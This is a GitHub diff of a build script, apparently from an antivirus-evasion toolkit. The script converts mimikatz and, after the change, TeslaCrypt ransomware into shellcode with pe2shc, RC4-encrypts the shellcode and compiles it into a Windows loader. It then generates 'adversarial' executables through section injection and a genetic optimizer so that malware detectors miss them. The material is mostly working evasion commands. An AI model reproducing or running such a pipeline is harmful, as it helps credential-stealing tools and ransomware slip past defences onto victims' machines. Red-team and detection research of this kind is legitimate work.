File tree 1 file changed +7
-3
lines changed
1 file changed +7
-3
lines changed Original file line number Diff line number Diff line change @@ -37,7 +37,7 @@ generate_key preset aabbccdd1122 input/key_raw.txt
37
37
38
38
# convert mimikatz executable into shellcode format
39
39
# Can be of course used with other .exe files
40
- wine ./../pe_to_shellcode/pe2shc.exe input/mimikatz .exe input/sc_raw.txt
40
+ wine ./../pe_to_shellcode/pe2shc.exe input/teslacrypt .exe input/sc_raw.txt
41
41
# encrypt payload
42
42
encode_payload rc4 input/sc_raw.txt input/sc_enc_raw.txt input/key_raw.txt
43
43
@@ -66,9 +66,13 @@ $win64_compiler -o output/rc4enc_mimikatz_adversarial_win64.exe source/avet.c
66
66
strip output/rc4enc_mimikatz_adversarial_win64.exe
67
67
68
68
# generate adversarial example
69
- gen_adversarial_exe full_dos output/rc4enc_mimikatz_adversarial_win64.exe
70
- sleep 2
69
+ practical_manipulation= " section_injection "
70
+ population_size=100
71
71
72
+ $genetic_optimizer -pm $practical_manipulation -p $population_size output/rc4enc_mimikatz_adversarial_win64.exe
73
+
74
+ # Or use practical manipulation without optimizer
75
+ # gen_adversarial_exe section_injection output/rc4enc_mimikatz_adversarial_win64.exe
72
76
73
77
# cleanup
74
78
cleanup_techniques
You can’t perform that action at this time.
0 commit comments